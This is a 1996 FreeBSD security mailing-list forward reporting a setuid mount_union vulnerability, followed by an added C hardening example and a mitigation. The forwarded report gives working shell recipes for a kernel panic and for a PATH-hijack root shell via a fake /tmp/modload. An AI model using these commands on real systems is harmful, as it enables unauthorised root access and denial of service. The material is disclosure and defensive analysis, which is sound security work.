From owner-freebsd-security Fri May 17 16:45:35 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA01126 for security-outgoing; Fri, 17 May 1996 16:45:35 -0700 (PDT)
Received: from io.org (io.org [198.133.36.1]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id QAA01121 for ; Fri, 17 May 1996 16:45:33 -0700 (PDT)
Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by io.org (8.6.12/8.6.12) with SMTP id TAA14734 for ; Fri, 17 May 1996 19:45:27 -0400
Date: Fri, 17 May 1996 19:44:25 -0400 (EDT)
From: Brian Tao
To: FREEBSD-SECURITY-L
Subject: SECURITY BUG in FreeBSD (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Here's the same bug reported by someone else on the -hackers list, with both the kernel panic and root shell exploits.
--
Brian Tao (BT300, taob@io.org, taob@ican.net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

---------- Forwarded message ----------
Date: Fri, 17 May 1996 19:06:03 -0400 (EDT)
From: Dan Polivy
To: freebsd-hackers@freebsd.org
Subject: SECURITY BUG in FreeBSD (fwd)

I came across this in my travels...thought you guys may be interested (in case you didn't already know)...It's worked for me on my -RELEASE, and -STABLE machines...dunno about any others...

Dan

+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|         JRI HIS MIS Systems Administrator/Tech Support         |
|////////////////////////////////////////////////////////////////|
| danp@busstop.org     dpolivy@jri.org    danp@library.pride.net |
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|
|         Check out JRI's Homepage at http://www.jri.org         |
|////////////////////////////////////////////////////////////////|
| EMail health@jri.org or check out http://www.jri.org/jrihealth |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

---------------------------------
Hi!

FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable

to crash system (as a normal user) try this:

    mkdir a
    mkdir b
    mount_union ~/a ~/b
    mount_union -b ~/a ~/b

to get euid try this:

    export PATH=/tmp:$PATH    #if zsh, of course
    echo /bin/sh >/tmp/modload
    chmod +x /tmp/modload
    mount_union /dir1 /dir2

and You are root!

Hole found by Adam Kubicki

Best wishes
Chris Labanowski
KL
----------------------------------
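
Added example (not part of the forwarded messages and not FreeBSD source): the root-shell report above implies that the setuid mount_union starts modload by bare name, so the invoking user's PATH decides which file runs. The sketch below shows the usual hardening for a privileged program that must run a helper: absolute path only, execve() with a fixed environment. The function name run_trusted_helper and the PATH value are assumptions made for this illustration.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to every helper. Nothing is inherited from the
 * invoking user, so a PATH such as "/tmp:..." never reaches the child.
 * The directory list is an assumption for this example. */
static char *const clean_env[] = {
    "PATH=/sbin:/bin:/usr/sbin:/usr/bin",
    NULL
};

/* Run a helper on behalf of a privileged (setuid) program.
 * Returns the helper's exit status (127 if it could not be executed),
 * or -1 if the request was refused, fork failed, or the child was killed. */
int run_trusted_helper(const char *abs_path, char *const argv[])
{
    int status;
    pid_t pid;

    /* Refuse bare names: "modload" would have to be looked up through
     * PATH, which is under the caller's control. */
    if (abs_path == NULL || abs_path[0] != '/') {
        errno = EINVAL;
        return -1;
    }

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() never searches PATH, unlike execvp()/execlp()/system(),
         * and the child sees only clean_env. */
        execve(abs_path, argv, clean_env);
        _exit(127);
    }

    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Until a fixed binary is installed, the message's own condition ("if suid is set") points at the interim mitigation: clear the setuid bit on mount_union.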